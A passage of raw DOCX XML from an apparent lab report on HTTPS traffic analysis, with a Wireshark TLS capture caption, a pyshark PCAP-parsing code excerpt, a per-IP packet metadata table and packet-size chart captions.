          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> packets over 300 seconds. Of these, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1,247</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> matched the TLS/HTTPS filter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Wireshark HTTPS Analysis Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5286375" cy="2847975"/>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86375" cy="2847975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: Wireshark HTTPS Capture — TLSv1.3 Session Analysis, Packet Detail &amp; Hex Dump (Filter: tls &amp;&amp; ip.addr==192.168.1.10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Python Traffic Analysis Script (traffic_analyzer.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation choice: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pyshark was selected over raw Scapy because it wraps tshark's full protocol dissector library, giving access to all Wireshark field names by name (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pkt.ip.src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pkt.tcp.dstport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) without manually parsing binary packet structures. For the chart generation, matplotlib is used because it produces publication-quality figures with fine-grained styling control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key code excerpt — packet parsing with pyshark:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">def parse_pcap(pcap_path: str, max_packets: int = 5000) -&gt; list[PacketRecord]:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Parse PCAP via pyshark — tshark dissectors available for all protocols"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    cap = pyshark.FileCapture(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        pcap_path,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        display_filter="ip",   # Skip non-IP frames</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        keep_packets=False,    # Stream mode — avoids RAM exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    for pkt in cap:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        src_ip = pkt.ip.src</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        dst_ip = pkt.ip.dst</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        length = int(pkt.length)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        ts     = float(pkt.sniff_timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        if hasattr(pkt, "tcp"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            dst_port = int(pkt.tcp.dstport)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        records.append(PacketRecord(ts, src_ip, dst_ip, ..., length))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">traffic_analyzer.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (provided as separate deliverable). Run with: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 traffic_analyzer.py --pcap https_capture.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">--demo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for synthetic data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Packet Metadata Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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1400"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1700"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:shd w:fill="2C3E5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Source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:shd w:fill="2C3E5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Dest IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="2C3E5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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:shd w:fill="2C3E5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Packets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="2C3E5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Avg Pkt Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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192.168.1.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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142.250.80.46</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TLSv1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>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218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>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740 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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192.168.1.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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151.101.1.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TLSv1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>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216</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>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697 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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192.168.1.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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104.16.132.229</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TLSv1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>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208</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>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688 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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192.168.1.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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52.94.236.248</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TLSv1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>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185</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>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722 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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192.168.1.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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13.107.4.52</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TLSv1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>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173</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>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681 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4: Packet metadata — top-5 source IPs from traffic_analyzer.py output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Packet Size Distribution &amp; IP Traffic Charts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5238750" cy="2200275"/>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2200275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Packet Size Distribution (Binned Bar Chart) and CDF of Raw Packet Sizes — traffic_analyzer.py output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5238750" cy="2143125"/>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38750" cy="2143125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="80"/>
        <w:jc w:val="center"/>
